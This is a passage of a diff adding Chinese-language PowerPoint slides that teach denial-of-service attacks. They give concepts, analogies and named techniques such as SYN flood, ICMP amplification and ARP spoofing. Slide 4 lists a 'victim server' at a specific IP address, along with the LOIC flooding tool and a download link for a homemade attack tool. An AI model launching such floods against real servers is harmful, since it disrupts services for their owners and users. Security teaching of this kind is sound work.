+              <a:t>我要畢業了，我可以肆無忌憚的亂教黑魔法了</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" strike="sngStrike" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3432416375"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide3.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{8140275C-B7AE-4E32-9365-0DF744C91CF1}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>阻斷服務式攻擊 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>(DoS)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{496D8973-1F3A-4DA5-A4DD-B4765D549E7D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>概念</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>讓伺服器無法運作</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>舉例</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>一千個人同時打電話給你 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>(Flooding)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>在你的飯裡面下藥 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>(Malicious packet/request)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49968477"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide4.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{DCD9AA0C-309C-4655-8F06-A4314FDBC837}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>阻斷服務式攻擊 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>(DoS)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E2A87BBB-C870-444F-BA27-9088F5B00F37}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>受害者伺服器</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>(Victim server</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0" smtClean="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>http://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>35.201.159.86</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-CA" strike="sngStrike" dirty="0" err="1" smtClean="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>GreenJudge</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" strike="sngStrike" dirty="0" smtClean="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" lvl="1" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>實作</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>LOIC</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>邦寧小工具</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>https://drive.google.com/file/d/1k6KkImZjs295YsXg-hmwNzpHdKJZch6s/view?usp=sharing</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1421876659"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{0CADBB87-38A6-4F26-A517-44B988E12A42}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>阻斷服務式攻擊 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>(DoS)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{FEE57F27-54CF-4D05-91C0-48C2B20C968B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>更進一步</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" altLang="zh-TW" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>TCP Synchronize Flood</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>ICMP amplification flood</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>ARP Spoof</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>惡意封包</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>Malicious packet)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>惡意請求</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" altLang="zh-TW" dirty="0">
+                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              </a:rPr>
+              <a:t>(Malicious request)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1025986437"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide6.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="標題 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
